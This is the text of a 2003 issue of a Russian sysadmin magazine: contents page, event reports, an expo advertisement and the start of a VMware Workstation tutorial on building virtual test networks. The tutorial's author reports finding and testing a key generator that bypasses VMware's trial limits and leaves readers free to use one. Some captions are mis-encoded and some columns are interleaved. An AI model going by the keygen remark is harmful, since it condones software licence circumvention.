№9(10) сентябрь 2003

подписной индекс 81655

журнал для cистемных администраторов,
вебмастеров и программистов

Маленький Linux
в качестве firewall
Работа с жестким диском
на программном уровне
Виртуальный полигон
для администратора
и разработчика
Искажение ТОС
как средство борьбы
с несанкционированным
копированием диска
Рецепты правильного
трудоустройства
Построение
переносимого Shell-кода
№9(10) сентябрь 2003

для Windows-систем
 оглавление

РЕПОРТАЖ 2, 4 БЕЗОПАСНОСТЬ

АДМИНИСТРИРОВАНИЕ Очередная веская причина

задуматься о переходе
с ОС Windows на альтернативу
Виртуальный полигон Список червей в Сети дополнен еще одним – W32.Blaster.
для администратора и разработчика Анализ червя и «лекарство» от него.
Используйте технические возможности VMWare Виктор Игнатьев
на все 100%. n4vy@nm.ru 62
Андрей Бешков
tigrisha@sysadmins.ru 8
Построение переносимого Shell-кода
для Windows-систем
Маленький Linux в качестве firewall Станислав Гошко
Обзор дистрибутивов, позволяющих настроить совмес- bigafroelephaut@mail.ru 66
тный доступ в Интернет и имеющих среди дополнитель-
ных возможностей firewall, NAT, кеширующий DNS-сер-
вер, DHCP-сервер, ftp- и www-сервера, а в более про- Атака на переполнение буфера
двинутых решениях даже VPN. через неисполнимый стек
Сергей Яремчук в Windows NT/2000/XP
grinder@ua.fm 24 Станислав Гошко
bigafroelephaut@mail.ru 70
Искажение TOC как средство борьбы
с несанкционированным копированием ПРОГРАММИРОВАНИЕ
диска
Крис Касперски
kk@sendmail.ru 34 Работа с базами данных на Perl
Владислав Гошко
synthetic@inbox.ru
Загрузка по сети 74
Описывается загрузка (не путать с установкой!) опе-
рационной системы Linux по сети. ОБРАЗОВАНИЕ
Денис Колисниченко
dhsilabs@mail.ru 46
Скупой платит дважды, а умный
использует GNU Public License
Postfix+...+SpamAssassin Сравнение позиций и комментарии существенных мо-
Mini-howto ментов двух лицензий: GNU Public License и Microsoft.
Бороться с нежелательной почтой можно по-разному. Эта Павел Закляков
статья расскажет, как прикрутить фильтр SpamAssassin amdk7@mail.ru 80
к MTA Postfix.
Андрей Мозговой
brain@m9.ru 50 IMHO

HARDWARE Рецепты правильного трудоустройства

Подойдите к поиску своего призвания творчески
и не бойтесь экспериментировать!
Работа с жестким диском Крис Касперски
на программном уровне kk@sendmail.ru 88
Как осуществить доступ к IDE-диску на программном
уровне при помощи файла устройства и через порты
ATA-контроллера.
Владимир Мешков
BUGTRAQ 45, 65, 69, 78
ubob@mail.ru 54

№9(10), сентябрь 2003 1

 репортаж
SYSM.01
12 июля состоялся первый Семинар си-
стемных администраторов и инженеров,
организованный порталом SysAdmins.ru
и приуроченный ко второй годовщине
сего проекта. Собралось более 130 спе-
циалистов из Москвы, Санкт-Петербур-
га, Ростова-на-Дону, Екатеринбурга, Ка-
зани. Большинство из них – професси-
ональные и начинающие системные ад-
министраторы, а также IT-специалисты,
«выросшие» из сисадминов – руководи-
тели IT-подразделений и служб техни-
ческой поддержки, IT-аналитики, сис-
темные инженеры .
Как и было обещано организатора-
ми, семинар состоялся в действитель-
но уютном и спокойном месте, которое
оказалось удобным и для размещения
иногородних участников.
Удалось все: успешно подобраны
темы выступлений, докладчикам при- Äèïëîìû ïî 3-ì íîìèíàöèÿì
шлось отвечать на многочисленные вопросы, обсужде- ным участником форума оказался Руслан Иванов (aka Rend).
ние не прекращалось и в перерывах между выступления- Атмосфера была потрясающая, общение – эффек-
ми. В кулуарах происходили не менее интересные дис- тивным и плодотворным. По словам одного из органи-
куссии, споры, обмен информацией и опытом, завязыва- заторов, Алексея Липовцева, мероприятие удалось на
лись деловые контакты, не обошлось и без сисадминских все 100%, и следующий SYSM, который состоится в де-
историй и баек. кабре 2003 года, обещает быть еще более интересным
После всех выступлений состоялось награждение па- и масштабным.
мятными дипломами участников по трем номинациям: луч- Темы и материалы выступлений вы можете найти на
шим модератором форума SysAdmins.ru безоговорочно http://sysadmins.ru
был признан Андрей Бешков (aka Tigrisha), лучшим ньюс- Наталья Хвостова
мейкером – Дмитрий Репин (aka стариk), а самым актив- Фото Алексея Фомина

Æàðêèå äèñêóññèè â ïåðåðûâàõ

2
 репортаж

Âûñòóïëåíèå Àíäðåÿ Áåøêîâà

SYSM.01 çàâåðø¸í. Óäà÷íî

№9(10), сентябрь 2003 3

 репортаж
Linux_fest-5.0
В последние выходные июля прошел «пятый фестиваль
разработчиков и пользователей свободного ПО «Линукс
Фест».
Несмотря на столь официальное название, фестиваль
больше всего напоминал КСП-шный слет, на котором вме-
сто песен говорили о дистрибутивах, хотя песен вечером
под гитару также хватало (ну и туристы ведь тоже о ком-
пьютерах болтают). Как вы уже поняли, фестиваль был в
лесу, на берегу замечательной речки Протвы, текущей
на границе Калужской и Московской областей. Столь не-
формальная форма проведения фестиваля была выбра-
на не случайно: на берегу речки или около костра стира-
ется разница между «зубрами» и новичками, можно спо-
койно поговорить, да и вообще – это фестиваль, а на фе-
стивале должно быть весело!
ALT Linux – ýòèì âñ¸ ñêàçàíî
объяснял находящимся вокруг особенности компиляции и
настройки системы. Надо сказать, что в +30°C такое мес-
тоположение лектора и аудитории весьма осмысленно.
Но больше всего мне запомнилась ночь: весь лес был
освещен свечками, ими же была выложена лестница к
воде, свечки стояли на берегу и в листьях кувшинок, а
некоторые, смытые течением, плыли по реке. В ночи эта
светящаяся лестница и река с уплывающими в туман све-
чами производила великолепное впечатление!
В общем, все участники хорошо отдохнули, пообща-
лись с интересными людьми и узнали что-то новое.
Эх, кабы не работа, остался бы там еще на денек!

Константин Меделян
Íåîôèöèàëüíûé ñèìâîë ôåñòèâàëÿ
Фото Валентины Ванеевы
Для увеселения были придуманы конкурсы – «сизифов
труд» (надо вкатить в гору здоровенную колоду, а потом
спустить вниз, на время), «перетягивание к хабу» (а по-
скольку сисадмин должен протянуть сеть в любых услови-
ях, то перетягивали в воде), и многие другие. Призами в
конкурсах были полные подшивки нашего журнала, майки
от ALT Linux, а за некоторые конкурсы – дистрибутивы (ко-
манда, перетянувшая каоксиальный провод на свой берег,
получила дистрибутив «Утеса» – самой последней защи-
щенной серверной версии от ALT Linux). Кроме развлече-
ний, разумеется, были и серьезные семинары, хотя порой
и облечённые в несерьезную форму: так, один семинар
проходил в воде! Разработчик некого ПО сидя в речке,

Îðãêîìèòåò è âñå, âñå, âñå Íî÷ü. Òåìíàÿ ðåêà

4
 репортаж

Ðåêà Ïðîòâà

«Ìîêðûé ñåìèíàð»

№9(10), сентябрь 2003 5

 Уважаемые господа!
Компания «ITE LLC» (Москва), при содействии
ITE Group Plc (Великобритания) предлагает
Вашему вниманию
НЕДЕЛЮ ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ
«IT-WEEK 2004»
Москва, Экспоцентр на Красной Пресне
26 – 29 апреля 2004 года
Неделя Информационных Технологий «IT-Week 2004»
это:

Крупнейший в России и странах СНГ форум в отрасли
Информационных Технологий

Пять международных IT-выставок, проводимых в одно
время и в одном месте

Две международные конференции

Более 250 компаний-участников из 25 стран мира

Свыше 75 000 посетителей из более чем 500 городов
России и СНГ

35 000 специалистов IT-индустрии в деловой части вы-
ставки

Официальная поддержка Министерства РФ по связи
и информатизации, Министерства промышленности,
науки и технологий РФ, Министерства экономическо-
го развития и торговли РФ, Министерства образова-
ния РФ, а также Правительства Москвы
В рамках «IT-Week 2004» пройдут следующие выстав-
ки и конференции:
1. Personal Computing Expo – общая, неспециализиро-
ванная выставка, ориентированная на конечных
пользователей. В ней представлены производители и
дистрибьюторы персональных компьютеров и перифе-
рии, компьютерных игр, дистрибьюторы сотовой тех-
ники и портативных компьютеров, интернет- и контент-
провайдеры и многие другие.
2. Hardware & Peripherals Expo – специализированная
выставка, на которой представлены: компьютеры, мо-
ниторы, периферийные устройства, комплектующие,
накопители, коммуникационное оборудование и услу-
ги, т.е. весь спектр hardware, ориентированного на ве-
дение бизнеса.
3. Software Expo – специализированная выставка, ори-
ентированная на программные продукты для систем
бухгалтерского и складского учета, комплексного ПО
управления предприятием, систем управления доку-
ментооборотом, систем распознавания документов,
разработку ПО, защиту информации. В рамках этой
выставки будет подготовлен цикл тематических се-
минаров, посвященных актуальным вопросам в об-
ласти разработки экономических программ и систем
управления бизнесом.
6
4. Специализированная выставка CAD/CAM/CAE представ-
ляет системы автоматизированного проектирования. Для
большинства российских производителей необходимость
использования САПР для оптимизации работы предпри-
ятия стала очевидной. Особенно ярко это проявляется в
таких отраслях, как авиастроение, автомобилестроение,
тяжелое машиностроение, архитектура, строительство,
нефтегазовая промышленность.
5. eLearn Expo – специализированная выставка, на кото-
рой будут демонстрироваться новейшие продукты и тех-
нологии в сфере электронного обучения, предназначен-
ные для коллективного и индивидуального пользования.
Дистанционное обучение через сети Internet и Intranet,
получившее широкое распространение в развитых стра-
нах, становится все более актуальным и для России.
6. eBusiness Russia (Электронный бизнес в России) –
международная конференции, посвященная вопросам
автоматизации бизнес-процессов, развития электрон-
ной коммерции, подбора ИТ-персонала.
7. Международная конференция eLearning Russia (Ин-
формационные технологии в образовании), на которой
будут освещены последние достижения образователь-
ных технологий в школах, вузах, а также рассмотрены
вопросы дистанционного и бизнес-образования.
Рекламная кампания по привлечению посетителей на
IT-Week основана на многолетнем опыте проведения выс-
тавок, тщательном анализе данных маркетинговых иссле-
дований и четком выделении целевой аудитории. Посеще-
ние специализированных выставок Hardware & Peripherals
Expo, Software Expo, CAD/CAM/CAE, eLearn Expo, состав-
ляющих деловую часть Недели Информационных Тех-
нологий, возможно только для корпоративных бизнес-по-
сетителей, прошедших регистрацию. Это позволяет каче-
ственно изменить состав посетителей этой части и дает
возможность участникам в деловой обстановке предста-
вить свою продукцию и услуги заинтересованным специа-
листам и партнерам по бизнесу. Практически полностью
аудитория деловой части IT-Week представлена менед-
жерами высшего и среднего звена, техническими специа-
листами и системными администраторами.
Тел.: +7 (095) 935 7350, 935 8120
eMail: it-week@ite-expo.ru
администрирование

ВИРТУАЛЬНЫЙ ПОЛИГОН
ДЛЯ АДМИНИСТРАТОРА
И РАЗРАБОТЧИКА

Сегодня мы поговорим о VMWare Workstation – самом младшем из продуктов в линейке виртуальных

машин фирмы VMWare. Если расположить их в порядке убывания стоимости и сложности внутреннего
устройства, то получится такая цепочка VMWare GSX Server, VMWare ESX Server, VMWare Workstation.
Сначала идут решения промышленного класса GSX Server и ESX Server. В контексте сегодняшней темы
говорить о них мы не будем, иначе статья займет слишком много места.
АНДРЕЙ БЕШКОВ
8

Лично меня – а по прочтении этой статьи, возможно, и
вас – будет больше всего интересовать VMWare Workstation,
как наиболее близкая по предоставляемым возможнос-
тям к нуждам большинства пользователей.
В последнее время я все чаще и чаще сталкиваюсь со
статьями о технологиях виртуальных машин, построенных
на основе VMWare Workstation. Странно, но большинство
авторов словно зациклились на описании того, как с по-
мощью виртуальной машины запустить Windows и его род-
ные приложения под Linux. Судя по количеству опублико-
ванных статей и популярности у сетевого сообщества та-
кого рода развлечений, мне кажется, что, несмотря на
ежегодные уверенные заявления линуксоидов о превос-
ходстве их любимой операционной системы над Windows,
пингвин еще недостаточно созрел, чтобы занять место
Windows в качестве настольной операционной системы
для повседневного пользования. Иначе откуда у рядово-
го пользователя Linux такая нездоровая тяга к проприе-
тарному программному обеспечению? Налицо положение,
интересное своей парадоксальностью, – люди, работаю-
щие на свободно распространяемой системе, использу-
ют виртуальную машину стоимостью в 300$ только для
того, чтобы запускать внутри нее Windows и набор сопут-
ствующих утилит и программ. Самое веселое в этой си-
туации то, что за весь список программного обеспечения
от Майкрософт и прочих производителей, выполняюще-
гося внутри этой самой машины, все равно нужно пла-
тить лицензионные отчисления, если не хочешь иметь про-
блем с законом. Такой способ работы, по моему личному
мнению, похож на разбивание орехов золотым микроско-
пом внушительных размеров. Результат, ради которого
затевались все эти танцы вокруг кактуса, вроде бы дос-
тигнут, но возможности VMWare Workstation используют-
ся от силы на 10 процентов, да и по деньгам уж очень
накладно получается. Особенно если учесть то обстоя-
тельство, что существуют другие способы запустить
Windows-программы под Linux. Решить большинство из
вышеописанных проблем, возникающих при попытке за-
пуска чужеродного программного обеспечения, можно с
помощью Wine, Win4Lin, Crossover Office, bochs.
Перед тем как пуститься в обсуждение всего разнооб-
разия полезных применений этого продукта, разберемся
с некоторыми наиболее важными базовыми терминами,
которые будут часто использоваться в дальнейшем на про-
тяжении всей статьи.
Операционная система, под управлением которой ра-
ботает программа VMWare Workstation, называется «ос-
новной» системой.
В качестве основной операционной системы пока мож-
но использовать только Linux и Windows. К сожалению, 4-я
VMWare Workstation еще не портирована для FreeBSD. По-
этому поклонникам этой операционной системы придет-
ся довольствоваться несколько устаревшей 3-й версией.
Давайте посмотрим, какие дистрибутивы Linux офи-
циально поддерживаются и могут выступать в роли ос-
новной системы:

Mandrake Linux 8.2, 9.0

Red Hat Advanced Server 2.1

Red Hat Linux 7.0, 7.1, 7.2, 7.3, 8.0
№9(10), сентябрь 2003
администрирование

SuSe Linux Enterprise Server 7,8

SuSe Linux 7.3, 8.0, 8.1
Официально поддерживаемыми называются те виды
Linux, для которых разработчики VMWare Workstation со-
здали бинарные файлы модулей, загружаемых в ядро.
Пользователи всех остальных версий Linux должны ком-
пилировать такие модули из исходных текстов самостоя-
тельно. Несмотря на то, что нашего ALT Linux Master 2.2 в
этом списке нет, мы все же настроим и запустим VMWare
Workstation под его управлением. Разобравшись с Linux,
обратим свой взор на Windows.
Ниже привожу список операционных систем Windows,
рекомендованных к использованию в роли основной:

Windows Server 2003 Web Edition RC2, Standard Edition
RC2 , Enterprise Edition RC2

Windows XP Professional, Home Edition

Windows 2000 Professional, Server, Advanced Server

Windows NT Workstation 4.0, Server 4.0, Terminal Server
Edition 4.0 – все с сервиспаком 6
Теперь перейдем ко второму виду систем. Системы,
запущенные внутри контейнера виртуальной машины
VMWare Workstation, называются «гостевыми». На дан-
ный момент можно запускать следующие системы:

Windows Server 2003 Web Edition RC2, Standard Edition RC2,
Enterprise Edition RC2

Windows 2000 Professional, Server, Advanced Server

Windows XP Professional, Home Edition

Windows NT Workstation 4.0, Server 4.0, Terminal Server
Edition 4.0

Windows 3.1, 3.11, 95, 98, 98 SE, ME

Red Hat Linux 7.0, 7.1, 7.2, 7.3, 8.0

Linux Mandrake 8.2, 9.0

SuSe Linux 7.3

SuSe Linux Enterprise Server 7.0, 8.0, 8.1

Turbolinux Server 7.0, 8.0

Turbolinux Workstation 8.0

Microsoft MS-DOS 6.x

FreeBSD 4.0-4.6.2, 4.8

Novell Netware 5.1, 6
Количество официальных основных и гостевых сис-
тем постоянно расширяется, поэтому, если вы не нашли
в нем свою систему, не огорчайтесь. Имеет смысл по-
смотреть самую последнюю версию спиcка по адресу
http://vmware.com/support/. Если же и в нем нет вашей си-
стемы, не отчаивайтесь. Возможно, что нужная вам сис-
тема нормально работает внутри виртуальной машины,
но персонал фирмы VMWare, ответственный за тестиро-
вание новых систем, просто не пробовал устанавливать
и запускать ее. К примеру, несмотря на то, что NetBSD,
ASP Linux, Black Cat Linux и OpenBSD отсутствуют в при-
веденном выше списке, все они отлично работали внутри
моих тестовых виртуальных машин.
Как ни странно, но, приложив некоторое количество
усилий и проведя некоторые нестандартные манипуляции,
мне удалось более или менее сносно запустить внутри
контейнера даже такую экзотику, как QNX. Хотя она и за-
9
 администрирование
работала, но из-за специфических методик тестирования
оборудования, используемых на этапе начальной загруз-
ки, ожидание ее длилось почти 15 минут. В процессе тес-
тирования обнаружилось, что временами эта гостевая
система по непонятным причинам впадает в глубокую за-
думчивость на срок от двух до пяти минут. Во всем ос-
тальном она работала довольно стабильно. Отсюда де-
лаем вывод, что система виртуальных машин имеет боль-
шой запас прочности и работает гораздо лучше, чем ду-
мают ее создатели.
Авторы VMWare Workstation не запрещают вам рабо-
тать с их продуктом любым пришедшим в голову спосо-
бом, но все же справедливо считают, что использовать его
лучше всего для наиболее интересных и нетривиальных
задач. Давайте подробнее обсудим это странное несовпа-
дение взглядов на одну и ту же программу.
Человеку, правильно понимающему, как разумно ис-
пользовать технологию виртуальных машин по прямому
назначению, продукт, являющийся предметом обсужде-
ния этой статьи, в первую очередь может принести пользу
с помощью существенного ускорения процесса разработ-
ки программного обеспечения. Представьте себе ситуа-
цию, часто складывающуюся в процессе разработки про-
граммы сразу для нескольких операционных систем. На
первый взгляд все довольно легко. Пишем переносимый
код и с помощью кроссплатформенного компилятора со-
здаем бинарные файлы для каждой операционной систе-
мы. Затем записываем их на сменный носитель или раз-
дел диска, доступный всем операционным системам, ус-
тановленным на машине. Тестируем работу программы
под текущей операционной системой. Завершаем рабо-
ту с этой операционкой и перегружаем компьютер. Заг-
рузив следующую операционную систему, принимаемся
за тестирование образца, предназначенного для нее. И
так до тех пор, пока не проверим все варианты. Хорошо,
если все версии бинарных файлов работают как нужно с
первого раза. Но в жизни подобное счастье приключает-
ся весьма редко. Таким образом, большая часть рабоче-
го времени будет потрачена на постоянные перезагрузки
из одной системы в другую. Если же мы пользуемся
VMWare Workstation, жизнь становится гораздо проще.
Под управлением основной системы одновременно запу-
щены сразу все нужные нам операционные системы. Каж-
дая из них сидит в своем контейнере и терпеливо ожида-
ет нашего внимания, пребывая в полной уверенности, что
на этом компьютере выполняется только она. Теперь про-
цесс тестирования проходит на порядок быстрее. Нужно
только переключаться между операционными системами
и проверять работоспособность своей программы.
Другим полезным применением виртуальной машины
может стать необходимость исследования нового, неизве-
стного и даже потенциально опасного программного обес-
печения. Кроме прочих кроссплатформенных удобств, это
дает возможность безопасно изучать компьютерные виру-
сы и вредоносные программы. Внутри тестового контей-
нера легко создать нужную среду. Изолированность вир-
туальной машины от основной операционной системы дает
возможность не бояться дальнейшего распространения
вируса или срабатывания вредоносных механизмов иссле-
10
дуемого программного обеспечения. После того как экс-
перименты закончены, не составляет труда вернуть кон-
тейнер, а соответственно и систему внутри него, в то со-
стояние, в котором они были до того, как мы начали наши
исследования. А при наличии желания и страсти к разру-
шению, можно вообще с легкостью уничтожить содержи-
мое контейнера вместе со всеми опасными объектами,
получившимися в результате тестов.
Следующей нишей, в которой возможно успешное ис-
пользование описываемой технологии, является обучение
работе с теми или иными программными комплексами. Со-
здав одну виртуальную машину с нужным набором про-
граммного обеспечения, в течение нескольких минут мож-
но растиражировать ее на все машины компьютерного
класса. Ничего страшного не произойдет, если обучаемый
в процессе освоения преподаваемых технологий умышлен-
но или нечаянно разрушит подопытную среду. Для восста-
новления поврежденной виртуальной машины из резерв-
ной копии понадобится всего несколько минут.
Подумайте, насколько удобно будет проводить реклам-
ные презентации внутри виртуальной машины. Можно
выбрать любую из целевых операционных систем. Но
вместо демонстрации слайдов появляется потрясающая
возможность в режиме реального времени активно про-
водить демонстрацию методов работы, разнообразных
удобств, конкурентных преимуществ и прочих интерес-
ных свойств рекламируемого продукта.
Также перспективным является применение виртуаль-
ных машин в службах технической поддержки. Только
представьте себе возможность в течение короткого про-
межутка времени построить среду, полностью повторяю-
щую конфигурацию пользовательской машины. Благода-
ря такому подходу, поиск проблемы и ее устранение ус-
коряются в несколько раз.
В процессе разработки стратегии миграции с одной
операционной системы на другую может возникнуть не-
обходимость проверить, как будет работать ваше специ-
фическое или самописное программное обеспечение в но-
вом окружении.
Все вышеперечисленные возможности выглядят очень
даже привлекательно, но все же статья не столько о них,
сколько об опыте комбинирования всего потенциала спо-
собностей VMWare Workstation. Давайте разберемся, как
сполна воспользоваться техническим могуществом, пре-
доставляемым VMWare Workstation.
В связи со спецификой профессии, мне, как и многим
другим администраторам, приходится постоянно разра-
батывать способы интеграции между собой разных служб
и приложений. Иногда для проверки того или иного реше-
ния нужна всего лишь одна машина. А что прикажете де-
лать, если нужно имитировать работу одной или несколь-
ких связанных между собой локальных сетей? В данном
случае у нас есть два варианта действий.
Первый – по старинке взять завалявшийся на складе
коммутатор и из старых машин собрать маленькую сеть.
Проблема в том, что старого железа, как всегда, не хва-
тает. Вдобавок у такого решения есть еще один недоста-
ток, состоящий в том, что всю эту путаницу из проводов и
компьютеров нужно где-то расположить, но не у каждого

администратора на рабочем столе есть несколько квад-
ратных метров свободного места. У такого решения есть
еще одна неочевидная на первый взгляд загвоздка. Ник-
то не может гарантировать, что подержанное железо бу-
дет стабильно работать, как положено. Попав в такую
ловушку, можно потерять довольно много времени в по-
пытках выяснить, почему та или иная подопытная опера-
ционная система категорически отказывается устанавли-
ваться на выбранные компьютеры.
Второй вариант гораздо проще, удобнее. А самое глав-
ное – гораздо более продвинут с технической точки зре-
ния. Все, что нам понадобится, – это компьютер средней
мощности. Все наши тестовые сети и компьютеры, нахо-
дящиеся внутри них, мы создадим, используя средства
комплекса виртуальных машин VMWare Workstation.
В данной статье будет подробно описана последова-
тельность действий, необходимых для инсталляции
VMWare Workstation на Windows 2000 Professional. Затем
мы рассмотрим создание макета сетей, изображенного
на следующем рисунке.
Как сделать то же самое для ALT Linux Master 2.2, бу-
дет описано во второй части этой статьи.
В сетях Vmnet2 и Vmnet3 находятся машины, работаю-
щие под управлением операционных систем Windows 98SE
и Windows 2000. Машина Windows 98SE имеет статичес-
кий адрес 192.168.120.15, а Windows 2000 получает адрес
192.168.80.128 динамически с помощью DHCP. Сеть Vmnet1
№9(10), сентябрь 2003
администрирование
служит у нас демилитаризованной зоной (DMZ). Внутри нее
обитает машина со статическим адресом 192.168.40.32 под
управлением Linux Mandrake 9.0, на которой для демонст-
рации работы сетевых служб будет установлен веб-сервер
Apache со статическим адресом. Между собой три сети,
перечисленные выше, соединены с помощью шлюза, ра-
ботающего на основе FreeBSD 4.7 с тремя сетевыми ин-
терфейсами. Я надеюсь, всем понятно, что для более про-
стого функционирования наших сетей все три интерфейса
машины FreeBSD тоже должны иметь фиксированные ад-
реса. Ну и в роли нашего последнего пациента выступает
машина NetBSD с двумя интерфейсами. Первый из них с
адресом 192.168.40.57 смотрит в демилитаризованную
зону, а второй является шлюзом в Интернет. На втором
интерфейсе 192.168.32.128 работает механизм преобра-
зования сетевых адресов (NAT), это, в свою очередь, дает
возможность предоставить доступ к веб-серверу клиентам,
находящимся в Интернете. Частично благодаря этому ма-
шины, находящиеся в наших локальных сетях, могут легко
пользоваться услугами не только Linux веб-сервера, но
любого другого веб-сервера, расположившегося в любой
точке Интернета.
Таким образом, у нас получается рабочий макет стан-
дартной схемы локальной сети масштаба предприятия,
подключенной к Интернету. Для простоты понимания учеб-
ного примера проведена миниатюризация, заключающа-
яся в том, что в каждую сеть помещен только один компь-
11
 администрирование
ютер. Я думаю, этого будет достаточно для демонстра-
ции обсуждаемых концепций.
Если верить утверждениям разработчиков, то для того,
чтобы сносно работать с VMWare Workstation, нам потре-
буется компьютер со следующими характеристиками.
Скорость процессора минимум 266 MHz, но все же ре-
комендуется не ниже 400 MHz. Стоит обратить внимание
на тот факт, что поддержка мультипроцессорных систем
выполнена очень качественно. К примеру, можно указать,
на каком из нескольких процессоров будет выполняться та
или иная гостевая система.
Количество необходимой памяти рассчитываем по сле-
дующей формуле – память, необходимая для запуска ос-
новной системы, плюс память, требуемая для каждой го-
стевой системы. Минимумом принято считать 128 Мб, но
лучше иметь 256 Мб. Впрочем, как я убедился на собствен-
ном опыте, оперативной памяти никогда не бывает слиш-
ком много.
Видеоадаптер основной операционной системы должен
поддерживать режимы с количеством цветов более чем 256.
Пространство жесткого диска, необходимое для ин-
сталляции, рассчитывается так же, как и размер опера-
тивной памяти. В зависимости от основной операцион-
ной системы, для инсталляции пакета VMWare Workstation
нам потребуется иметь 100 Мб свободного пространства
на жестком диске для Windows и соответственно 20 Мб
для Linux. Считается хорошим тоном отдавать гостевым
системам столько же места, сколько нужно для установ-
ки каждой из них и всего сопутствующего программного
12
обеспечения на обычный компьютер. В то же время реко-
мендуется выделять не менее 1 Гб пространства на жест-
ком диске для любой гостевой операционной системы.
Итак, давайте разберемся с теорией функционирова-
ния VMWare Workstation. Внутри реальной машины на ос-
нове процессора X86 работает основная операционная
система. Под ее управлением выполняются приложения,
родные для этой системы. Несмотря на тот факт, что
VMWare Workstation также является родным для основ-
ной системы приложением, между ним и системой нахо-
дится тонкая прослойка, называемая «слоем виртуали-
зации» и позволяющая виртуализировать работу с обо-
рудованием, установленным на реальной машине. Это
нужно для того, чтобы позволить единообразно и прозрач-
но работать с подобным оборудованием из каждой госте-
вой системы. Следующая задача, которая решается вве-
дением такого промежуточного слоя, – это предоставле-
ние всем системам одновременного доступа к оборудо-
ванию реальной системы.
В свою очередь внутри приложения VMWare Workstation
находятся контейнеры виртуальных машин. Каждая из них
получает в свое распоряжение следующий набор вирту-
альных устройств:

Процессор – такой же частоты, как установленный в
настоящей машине. На многопроцессорном компью-
тере каждая машина получает доступ только к одному
из доступных процессоров.

BIOS – PhoenixBIOS версии 4.0 со встроенной поддер-
жкой VESA и ACPI.


Материнская плата на основе чипсета Intel 440BX с под- ми для разных платформ. Интересно то, что запраши-
держкой 82093 AA IOAPIC и NS3380 SIO.

Оперативная память – в зависимости от доступной на раз, но на разные почтовые ящики. Вот так можно ис-
реальной машине. Не может превышать предел в 1 Гб.

SCSI – до 7 одновременно подключенных устройств.
Дает возможность создавать виртуальные жесткие
диски размером до 256 Гб. Простой интерфейс рабо-
ты со SCSI-устройствами позволяет легко подключать
DVD-ROM, CD-ROM, ленточные накопители, сканеры
и прочие SCSI-устройства.

Два гибких диска формата 3.5 дюйма по 1.44 Мб.

Три Ethernet-карты, совместимых с AMD PCnet-PCI II.

Контроллер USB 1.1 UHCI с двумя портами. Позволя-
ет работать с USB-сканерами, принтерами, цифровы-
ми камерами, наладонными компьютерами, устрой-
ствами для чтения карт памяти.

Четыре последовательных (COM) порта.

Два параллельных (LPT) порта.

Клавиатура с расширенной поддержкой 104 клавиш.
Очень удобно для виртуальных машин, внутри кото-
рых работают гостевые Windows-системы.

Ввод и вывод звука через Creative Labs Sound Blaster
Audio PCI. К сожалению, MIDI и джойстик не поддер-
живаются.
На основе такого богатого выбора можно создавать
любые, даже самые экзотичные, комбинации из выше-
перечисленного оборудования. Следующей в нашем
списке фигурирует гостевая операционная система, ко-
торая работает с созданным нами набором виртуальных
устройств. На ее основе запускаются все приложения,
предназначенные для работы с этой конкретной систе-
мой. Разобравшись с картинкой и принципами функци-
онирования VMWare Workstation, приступим к практичес-
ким занятиям.
ALT Linux Master 2.2 в качестве основной Linux-систе-
мы был выбран не случайно, так как отсутствует в списке
официально поддерживаемых, а также за то, что вовре-
мя оказался под рукой. Кроме всего прочего он довольно
широко распространен среди русскоязычных пользова-
телей. Процедура установки на любой из официальных
Linux-дистрибутивов слишком проста, чтобы научить чи-
тателя чему-то полезному. Многие подводные камни прой-
дут мимо и не будут замечены до тех пор, пока не придет-
ся самостоятельно устанавливать VMWare Workstation для
работы под управлением неофициального варианта Linux.
Пользуясь моим опытом, читатель ценой малой крови
сможет устанавливать VMWare Workstation на множество
других разновидностей Linux.
Освоив минимум теории, необходимой для успешной
работы с VMWare Workstation, перейдем к активным дей-
ствиям. На сайте производителя http://www.vmware.com/
download/workstation.html заказываем себе пробный се-
рийный номер для Windows и Linux. Все подобные ли-
цензии действуют в течение 30 дней с момента отправ-
ки заказа. Таким образом, мы получаем в свое распоря-
жение на целый месяц полнофункциональную версию
программы. Через несколько минут в наш ящик элект-
ронной почты упадет два письма с серийными номера-
№9(10), сентябрь 2003
администрирование
вать пробные номера можно неограниченное количество
пользовать VMWare Workstation, не нарушая никаких за-
конов, сколько угодно долго. Подобная лояльная поли-
тика персонала VMWare.inc вызывает искреннее уваже-
ние. Видимо, деньги – не самое важное для них. Как
обычно, потакая собственному любопытству, я задался
целью посмотреть, как обстоит дело с надежностью за-
щиты, и пошел на ближайший поисковый сервер. Про-
грамма, генерирующая серийные номера для любой вер-
сии VMWare Workstation, была найдена всего за 15 ми-
нут. Протестировав работоспособность создаваемых
ключей для Windows и Linux, могу сказать, что они от-
лично работают и дают доступ к полной функциональ-
ности виртуальной машины, снимая всяческие времен-
ные ограничения. Годы пользования свободными опера-
ционными системами не прошли для меня даром, поэто-
му я очень не люблю нарушать любые лицензионные со-
глашения. Опираясь на все вышесказанное, для себя
лично принял решение не использовать добытые таким
образом серийные номера. Думаю, что маленькие еже-
месячные неудобства, связанные с заказом новых проб-
ных лицензий, – терпимая плата за возможность работы
с таким потрясающим инструментом без всяких проблем
с представителями закона. Вы же можете поступать, как
вам заблагорассудится.
В качестве первого этапа работы выполним процеду-
ру инсталляции VMWare Workstation для Windows. То, что
нам предстоит сделать, просто, как мычание. Скачиваем
отсюда: http://www.vmware.com/download/workstation.html
файл vmware-workstation-4.0.0-4460.
Желательно также взять фирменную документацию по
теории функционирования виртуальных машин и справоч-
ник часто задаваемых вопросов о гостевых системах в
формате pdf http://www.vmware.com/support/ws4/doc/. Ка-
чество и подробность изложения справочного материала
выше всяких похвал.
Запускаем инсталлятор на выполнение и несколько раз
нажимаем кнопку Yes. Затем принимаем лицензионное
соглашение.
Определяем целевую папку, куда нужно устанавливать
файлы VMWare Workstation.
13
 администрирование
После этого, следуя предупреждению, отключаем «Ав-
тозапуск» для устройства CD-ROM, потому что это может
вызывать интересные эффекты в гостевых системах.
Представьте себе одновременную попытку выполнить про-
грамму автозапуска с только что вставленного CD-ROM
внутри основной Windows и всех работающих на данный
момент версий гостевых Windows-систем. Ошибки, полу-
чившиеся в результате коллизий, вызванных борьбой за
доступ к CD-ROM, будут весьма странными.
Отказываемся от поиска файлов, оставшихся от пре-
дыдущих версий VMWare Workstation, так как на этой ма-
шине она устанавливается впервые. Если бы у нас та-
кие файлы имелись, можно было бы конвертировать их
в новый формат и использовать со свежеустановленной
версией.
Принимаем поздравления по факту завершения уста-
новки. И потихоньку, нажав кнопку «Finish», переходим к
следующему этапу.
Вводим серийный номер для Windows, взятый из пись-
ма. В качестве имени пользователя и названия компании
можно писать все, что придет в голову.
14
В соответствии с требованием программы инсталля-
ции перезагружаем Windows. После загрузки в первый
